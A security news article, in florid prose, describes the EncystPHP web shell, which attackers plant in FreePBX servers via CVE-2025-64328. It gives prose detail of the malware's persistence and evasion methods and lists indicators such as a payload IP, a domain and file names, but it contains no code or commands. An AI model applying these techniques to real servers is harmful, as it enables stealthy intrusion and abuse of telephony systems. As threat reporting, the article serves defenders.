Ask Master: The “EncystPHP” Web Shell is Silently Annexing Global FreePBX Telephony Servers

A mundane telephony vulnerability has metamorphosed into a comprehensive server capitulation. Cybersecurity specialists have unearthed a pernicious web shell, christened EncystPHP, which entrenches itself within FreePBX, granting malefactors perpetual administrative dominion over the compromised system.

This onslaught commenced in early December of the preceding year. The assailants weaponized vulnerability CVE-2025-64328, nested within the Endpoint Manager module of the FreePBX platform, specifically targeting iterations 17.0.2.36 through 17.0.3. This critical flaw facilitated the injection of arbitrary commands subsequent to authenticating within the administrative console. Consequently, the aggressors deployed a specialized loader onto the server, meticulously engineered to unfurl the EncystPHP payload.

The genesis of these attacks was traced to Brazil. Their crosshairs were fixed upon the infrastructure governed by an Indian technology conglomerate, an entity specializing in cloud and telecommunication services. The malignant payload was downloaded from the IP address 45.234.176.202, an endpoint inextricably linked to the domain crm.razatelefonia.pro. Upon navigating to a predetermined path, the server would autonomously redirect the victim toward a secondary loader.

Forensics have revealed a definitive nexus between this campaign and the notorious INJ3CTOR3 syndicate. Since 2020, this cabal has systematically exploited vulnerabilities across telecommunication platforms, pivoting their focus toward the Elastix system in 2022. Their contemporary maneuvers echo these historical stratagems, albeit exploiting this newly discovered chasm within FreePBX.

Did you find this discourse enlightening? Remain connected and subscribe to ensure you never miss an update.

EncystPHP operates with chilling precision and methodical grace. Initially, the loader alters the access privileges of essential FreePBX system files, rendering them impervious to both perusal and modification. Subsequently, the malignant code extracts the database configuration from the /etc/freepbx.conf repository, purging scheduler tasks and eradicating key user accounts, including ampuser and svc_freepbx. Following this, the program scours the architecture for rival web shells, identifying them via signature strings and functions, and ruthlessly obliterates the discovered files. Through this maneuver, the malefactors eliminate digital “competitors” and sanitize their newly conquered domain.

To solidify its foothold, EncystPHP forges a novel user account endowed with root privileges under the moniker newfpbx, assigns an identical password across multiple accounts, and aggressively escalates its own privileges. It then embeds its proprietary SSH key, vigilantly ensuring that port 22 remains perpetually ajar. This grants the attackers an indelible point of ingress, rendering any subsequent password alterations utterly futile.

The web shell cloaks itself under the guise of a legitimate ajax.php file nestled within the FreePBX directory. Its underlying code is shrouded in Base64 encoding, deciphering itself only upon execution. Its authentication mechanism is starkly pragmatic: the inputted password undergoes MD5 hashing and is juxtaposed against a preordained value. Upon successful ingress, an interface ominously titled “Ask Master” unfurls. Through this portal, the adversary can peruse the file system, monitor active processes, scrutinize live Asterisk channels, inventory SIP subscribers, and dissect the configurations of both FreePBX and Elastix. The shell is capable of executing arbitrary commands and possesses the audacity to initiate outbound telephonic calls via the compromised PBX exchange.

An independent loader, designated k.php, proliferates the web shell across a multitude of directories within /var/www/html/, astutely including folders that masquerade as benign telephony components. The temporal metadata of these files is meticulously forged to mirror legitimate timestamps, ensuring that a cursory inspection by an administrator will fail to discern the subterfuge. Furthermore, the malignant code generates an .htaccess file fraught with redirection edicts and executes auxiliary scripts, which it subsequently vaporizes to obscure any digital footprints.

The mechanism of entrenchment is profoundly multi-layered. The loader inscribes tasks into the cron daemon, engineered to inexorably download fresh iterations of the malicious files with every passing minute. The scripts periodically conjure the illusion of EncystPHP’s eradication, echoing rm commands without ever actualizing the deletion. A distinct file, masquerading as license.php, resurrects both loaders, suppresses error outputs, and thoroughly sanitizes the system logs. Consequently, a mere partial extirpation offers zero assurance of a cleansed server.

Specialists emphatically underscore that the successful exploitation of CVE-2025-64328 signifies an absolute capitulation of the system. Given that EncystPHP conceals itself amidst the native components of FreePBX and Elastix, detecting the contagion is an exceedingly arduous endeavor. The peril extends far beyond mere unauthorized access to the server, encompassing the rampant misappropriation of telephonic resources.

Concurrently, a Compromised Website Report has been published, bearing a critical threat designation. This dossier chronicles domains and devices wherein web shells or other vestiges of intrusion have been remotely identified. The registry features web shells residing within Sangoma FreePBX, tethered to the exploitation of CVE-2025-57819, alongside the compromises of Microsoft SharePoint via CVE-2025-53770, Fortinet FortiWeb via CVE-2025-25257, SAP NetWeaver via CVE-2025-31324, and a litany of incidents afflicting appliances from Ivanti, Citrix, Palo Alto Networks, and sundry other platforms. The authors sagely caution that receiving a 404 error during endpoint verification by no means precludes the presence of a web shell. Rigorous validation must be conducted intrinsically on the server side. Furthermore, given that a singular node is frequently co-opted by disparate syndicates, the discovery of initial breach indicators should invariably trigger a meticulous hunt for ancillary footprints of intrusion.

Proprietary antivirus arsenals now successfully detect EncystPHP under the nomenclatures PHP/EncystPHP.A!tr and BASH/EncystPHP.A!tr, whilst Intrusion Prevention Systems vigilantly thwart any endeavors to exploit CVE-2025-64328. Administrators of FreePBX architectures are urgently exhorted to deploy requisite patches immediately, audit their servers for extraneous user accounts and anomalous cron tasks, and, at the slightest whisper of suspicion, treat the incident as a total infrastructural annexation.